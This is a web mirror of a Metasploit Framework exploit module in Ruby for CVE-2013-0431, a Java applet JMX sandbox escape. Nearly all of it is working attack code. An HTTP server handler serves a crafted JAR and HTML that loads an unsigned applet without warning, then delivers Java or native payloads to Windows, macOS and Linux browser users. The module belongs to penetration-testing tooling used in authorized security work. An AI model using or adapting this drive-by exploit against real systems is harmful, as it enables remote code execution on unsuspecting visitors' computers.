Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
21633 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  # include Msf::Exploit::Remote::BrowserAutopwn

13
  # autopwn_info({ :javascript => false })

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Java Applet JMX Remote Code Execution',

20
        'Description' => %q{

21
          This module abuses the JMX classes from a Java Applet to run arbitrary Java code

22
          outside of the sandbox as exploited in the wild in February of 2013. Additionally,

23
          this module bypasses default security settings introduced in Java 7 Update 10 to run

24
          unsigned applet without displaying any warning to the user.

25
        },

26
        'License' => MSF_LICENSE,

27
        'Author' => [

28
          'Unknown', # Vulnerability discovery and exploit in the wild

29
          'Adam Gowdiak', # Vulnerability discovery

30
          'SecurityObscurity', # Exploit analysis and deobfuscation

31
          'juan vazquez' # Metasploit module

32
        ],

33
        'References' => [

34
          [ 'CVE', '2013-0431' ],

35
          [ 'OSVDB', '89613' ],

36
          [ 'BID', '57726' ],

37
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],

38
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],

39
          [ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],

40
          [ 'URL', 'http://pastebin.com/QWU1rqjf' ],

41
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]

42
        ],

43
        'Platform' => %w{java linux osx win},

44
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

45
        'Targets' => [

46
          [

47
            'Generic (Java Payload)',

48
            {

49
              'Platform' => ['java'],

50
              'Arch' => ARCH_JAVA,

51
            }

52
          ],

53
          [

54
            'Windows x86 (Native Payload)',

55
            {

56
              'Platform' => 'win',

57
              'Arch' => ARCH_X86,

58
            }

59
          ],

60
          [

61
            'Mac OS X x86 (Native Payload)',

62
            {

63
              'Platform' => 'osx',

64
              'Arch' => ARCH_X86,

65
            }

66
          ],

67
          [

68
            'Linux x86 (Native Payload)',

69
            {

70
              'Platform' => 'linux',

71
              'Arch' => ARCH_X86,

72
            }

73
          ],

74
        ],

75
        'DefaultTarget' => 0,

76
        'DisclosureDate' => '2013-01-19',

77
        'Notes' => {

78
          'Reliability' => UNKNOWN_RELIABILITY,

79
          'Stability' => UNKNOWN_STABILITY,

80
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

81
        }

82
      )

83
    )

84
  end

85


86
  def on_request_uri(cli, request)

87
    print_status("handling request for #{request.uri}")

88


89
    case request.uri

90
    when /\.jar$/i

91
      print_status("Sending JAR")

92
      send_response(cli, generate_jar, { 'Content-Type' => "application/octet-stream" })

93
    when /\/$/

94
      print_status("Sending HTML")

95
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

96
    else

97
      send_redirect(cli, get_resource() + '/', '')

98
    end

99
  end

100


101
  def generate_jar

102
    paths = [

103
      [ "Exploit.ser" ],

104
      [ "Exploit.class" ],

105
      [ "B.class" ]

106
    ]

107


108
    p = regenerate_payload(cli)

109


110
    jar = p.encoded_jar

111


112
    paths.each do |path|

113
      1.upto(path.length - 1) do |idx|

114
        full = path[0, idx].join("/") + "/"

115
        if !(jar.entries.map { |e| e.name }.include?(full))

116
          jar.add_file(full, '')

117
        end

118
      end

119
      fd = File.open(File.join(Msf::Config.data_directory, "exploits", "cve-2013-0431", path), "rb")

120
      data = fd.read(fd.stat.size)

121
      jar.add_file(path.join("/"), data)

122
      fd.close

123
    end

124
    return jar.pack

125
  end

126


127
  def generate_html

128
    html = <<~EOF

129
      <html>

130
      <script language="Javascript">

131


132
      var _app = navigator.appName;

133


134
      if (_app == 'Microsoft Internet Explorer') {

135
      document.write('<applet archive="#{rand_text_alpha(4 + rand(4))}.jar" object="Exploit.ser"></applet>');

136
      } else {

137
      document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4 + rand(4))}.jar"></embed>');

138
      }

139


140
      </script>

141
      </html>

142
    EOF

143
    return html

144
  end

145
end

146


147